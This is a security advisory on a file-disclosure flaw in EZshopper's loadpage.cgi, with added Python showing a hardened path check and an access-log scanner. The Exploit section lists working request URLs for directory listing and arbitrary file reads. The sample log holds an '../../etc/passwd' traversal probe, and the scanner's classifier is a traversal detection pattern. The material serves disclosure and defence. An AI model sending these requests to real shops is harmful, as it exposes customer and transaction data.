AHG's EZshopper is a modular e-commerce solution. NSFOCUS discovered a security flaw in EZshopper's loadpage.cgi. Its exploitation allows an attacker to retrieve a file list of EZshopper directories and the contents of sensitive files.
Credit:
The information has been provided by Nsfocus Security Team.
Vulnerable systems:
Alex Heiphetz Group EZshopper v.3.0 for Unix
Alex Heiphetz Group EZshopper v.2.0 for Unix
Details:
EZshopper consists of several Perl scripts, including a CGI program called loadpage.cgi that opens and displays HTML files under the EZshopper directory.
This program is usually called as follows:
EZshopper v3.0:
http://www.example.com/cgi-bin/ezshopper3/loadpage.cgi?user_id=<id>&file=<filename>
EZshopper v2.0:
http://www.example.com/cgi-bin/ezshopper2/loadpage.cgi?<id>+<filename>
However, loadpage.cgi does not check the user-supplied "<filename>" value to make sure it is a real file name. If a directory name is supplied as "<filename>", loadpage.cgi lists the contents of that EZshopper directory. Using the returned listing, an attacker can open a subdirectory or view the contents of sensitive files such as user data files, the transaction information file and .htaccess.
Note: This vulnerability cannot be used to view directories outside of EZshopper, since newer versions of EZshopper check whether the filename contains "../" and reject the request if it does.
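The following Python example is added here to illustrate the point above; it is not EZshopper's code and not part of the original advisory. weak_check() models only what the advisory says newer versions do (reject names containing "../"), which still lets "/" and "/subdirectory/" through. hardened_resolve() applies an assumed policy for a page-loading CGI: serve only regular .htm/.html files that resolve inside the script's own document directory, never directories, dotfiles or traversal segments. The directory tree and the request values it checks are constructed for the demonstration.

```python
import os
import tempfile
from typing import Dict, Optional, Tuple


# Added illustration, not EZshopper's own code. weak_check() reproduces only the
# behaviour the advisory describes for newer versions: the filename is rejected
# if it contains "../" and is otherwise used as given.
def weak_check(file_param: str) -> bool:
    """Return True if the advisory's '../' filter would let this filename through."""
    return "../" not in file_param


# Assumed hardening policy (not from the advisory): only regular page files
# located inside the script's document directory may be served.
ALLOWED_SUFFIXES = (".htm", ".html")


def hardened_resolve(base_dir: str, file_param: str) -> Optional[str]:
    """Return the absolute path to serve, or None if the request must be rejected."""
    # Treat the leading "/" used in the page's URL examples as relative to base_dir.
    rel = file_param.lstrip("/")
    # An empty name or a name ending in "/" denotes a directory, not a file.
    if not rel or rel.endswith("/"):
        return None
    # Every path component must be a plain name: no "", "." or ".." segments
    # (this covers "../" anywhere in the name, not just at the start).
    if any(part in ("", ".", "..") for part in rel.split("/")):
        return None
    # Dotfiles such as .htaccess are never pages.
    if os.path.basename(rel).startswith("."):
        return None
    if not rel.lower().endswith(ALLOWED_SUFFIXES):
        return None
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, rel))
    # Containment is checked on the resolved path, so a symlink cannot escape base_dir.
    if os.path.commonpath([base, target]) != base:
        return None
    # Only regular files are served; a directory or a missing file is refused.
    if not os.path.isfile(target):
        return None
    return target


def build_demo_tree() -> str:
    """Create a throwaway directory tree standing in for an EZshopper root (constructed)."""
    base = tempfile.mkdtemp(prefix="ezshopper_demo_")
    os.makedirs(os.path.join(base, "data"))
    for rel in ("index.html", "data/page.html", "data/orders.txt", ".htaccess"):
        with open(os.path.join(base, rel), "w") as fh:
            fh.write("placeholder\n")
    return base


# File arguments modelled on the page's URL examples; the id parameter is
# omitted because only the file argument matters here.
SAMPLE_REQUESTS = ["/", "/data/", "/data/page.html", "/data/orders.txt",
                   "/.htaccess", "../outside.html", "index.html"]


def evaluate(base: str) -> Dict[str, Tuple[bool, bool]]:
    """Map each sample file argument to (passes weak_check, accepted by hardened_resolve)."""
    return {r: (weak_check(r), hardened_resolve(base, r) is not None)
            for r in SAMPLE_REQUESTS}


if __name__ == "__main__":
    root = build_demo_tree()
    for req, (weak_ok, hard_ok) in evaluate(root).items():
        weak = "allow" if weak_ok else "deny"
        hard = "allow" if hard_ok else "deny"
        print(f"{req:18} weak filter: {weak:5}  hardened: {hard}")
```

Running the block shows that the "../" filter alone accepts every request except the traversal attempt, while the hardened resolver accepts only the two real pages. The containment check on the resolved path matters even once path components are validated: a symlink inside the document directory could otherwise point outside it.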
Exploit:
By submitting the following URL you will be able to see the file list of the EZshopper root directory (if the page appears blank, view the page source in the browser):
EZshopper v3.0:
http://www.example.com/cgi-bin/ezshopper3/loadpage.cgi?user_id=id&file=/
EZshopper v2.0:
http://www.example.com/cgi-bin/ezshopper2/loadpage.cgi?id+/
To view the file list of an EZshopper subdirectory, submit the following URL:
EZshopper v3.0:
http://www.example.com/cgi-bin/ezshopper3/loadpage.cgi?user_id=id&file=/subdirectory/
EZshopper v2.0:
http://www.example.com/cgi-bin/ezshopper2/loadpage.cgi?id+/subdirectory/
Once an attacker has obtained the list, he can use the following URL to view the content of arbitrary files:
EZshopper v3.0:
http://www.example.com/cgi-bin/ezshopper3/loadpage.cgi?user_id=<id>&file=/<directory>/<filename>
EZshopper v2.0:
http://www.example.com/cgi-bin/ezshopper2/loadpage.cgi?<id>+/<directory>/<filename>
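The following Python example is added here as a defender's counterpart to the request shapes above; it is not part of the original advisory and not EZshopper code. It scans web server access-log lines in Common Log Format, pulls the file argument out of both loadpage.cgi call styles shown on the page, and flags the patterns the advisory describes: directory listings (file argument ending in "/"), dotfiles such as .htaccess, non-HTML data files, and "../" traversal probes. The log lines are constructed for the demonstration (documentation IP ranges, made-up timestamps), and the assumption that a legitimate page load always names a .htm/.html file is the example's own.

```python
import re
from typing import Dict, List, Optional
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed Common Log Format lines (not real traffic). The request shapes
# follow the two loadpage.cgi call styles shown in the advisory.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Oct/2000:13:55:36 +0000] "GET /cgi-bin/ezshopper3/loadpage.cgi?user_id=1234&file=/ HTTP/1.0" 200 512',
    '203.0.113.5 - - [10/Oct/2000:13:55:40 +0000] "GET /cgi-bin/ezshopper3/loadpage.cgi?user_id=1234&file=/data/ HTTP/1.0" 200 1024',
    '203.0.113.5 - - [10/Oct/2000:13:55:44 +0000] "GET /cgi-bin/ezshopper3/loadpage.cgi?user_id=1234&file=/data/orders.txt HTTP/1.0" 200 4096',
    '203.0.113.5 - - [10/Oct/2000:13:55:48 +0000] "GET /cgi-bin/ezshopper3/loadpage.cgi?user_id=1234&file=/.htaccess HTTP/1.0" 200 88',
    '198.51.100.7 - - [10/Oct/2000:13:56:01 +0000] "GET /cgi-bin/ezshopper2/loadpage.cgi?1234+/orders/ HTTP/1.0" 200 700',
    '198.51.100.7 - - [10/Oct/2000:13:56:05 +0000] "GET /cgi-bin/ezshopper2/loadpage.cgi?1234+../../etc/passwd HTTP/1.0" 403 0',
    '192.0.2.9 - - [10/Oct/2000:13:57:10 +0000] "GET /cgi-bin/ezshopper3/loadpage.cgi?user_id=1234&file=catalog.html HTTP/1.0" 200 2048',
    '192.0.2.9 - - [10/Oct/2000:13:57:12 +0000] "GET /index.html HTTP/1.0" 200 300',
]

# Common Log Format: client, ident, user, [timestamp], "METHOD URL PROTO", status, size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<url>\S+) [^"]*" (?P<status>\d{3}) \S+'
)


def extract_file_param(url: str) -> Optional[str]:
    """Return the file argument of a loadpage.cgi request, or None for any other URL."""
    parts = urlsplit(url)
    if not parts.path.endswith("/loadpage.cgi"):
        return None
    query = parts.query
    if "file=" in query:                       # v3.0 style: ?user_id=<id>&file=<filename>
        return parse_qs(query).get("file", [None])[0]
    if "+" in query:                           # v2.0 style: ?<id>+<filename>
        return unquote(query.split("+", 1)[1])
    return None


def classify(file_param: Optional[str]) -> Optional[str]:
    """Name the reason a file argument is suspicious, or None if it looks like a normal page load."""
    if file_param is None:
        return None
    if ".." in file_param:
        return "path traversal attempt"
    if file_param == "" or file_param.endswith("/"):
        return "directory listing request"
    name = file_param.rsplit("/", 1)[-1]
    if name.startswith("."):
        return "dotfile request"
    # Assumption of this example: legitimate page loads always name an HTML file.
    if not name.lower().endswith((".htm", ".html")):
        return "non-HTML file request"
    return None


def scan(log_lines: List[str]) -> List[Dict[str, object]]:
    """Run every parsable line through the classifier and collect the hits in log order."""
    findings = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # unparsable line; a production scanner would count these
        file_param = extract_file_param(m.group("url"))
        reason = classify(file_param)
        if reason is not None:
            findings.append({"ip": m.group("ip"), "file": file_param,
                             "reason": reason, "status": int(m.group("status"))})
    return findings


def hits_by_ip(findings: List[Dict[str, object]]) -> Dict[str, int]:
    """Count flagged requests per client, the usual pivot for a follow-up investigation."""
    counts: Dict[str, int] = {}
    for f in findings:
        counts[str(f["ip"])] = counts.get(str(f["ip"]), 0) + 1
    return counts


if __name__ == "__main__":
    hits = scan(SAMPLE_LOG)
    for h in hits:
        print(f"{h['ip']:14} {h['status']} {h['reason']:26} file={h['file']!r}")
    print("per-client:", hits_by_ip(hits))
```

Note that a 200 status on a directory-listing request is the signal that matters: the advisory points out the listing may render as a blank page, so the response size and status, not the visible page, tell a reviewer whether the listing was actually returned.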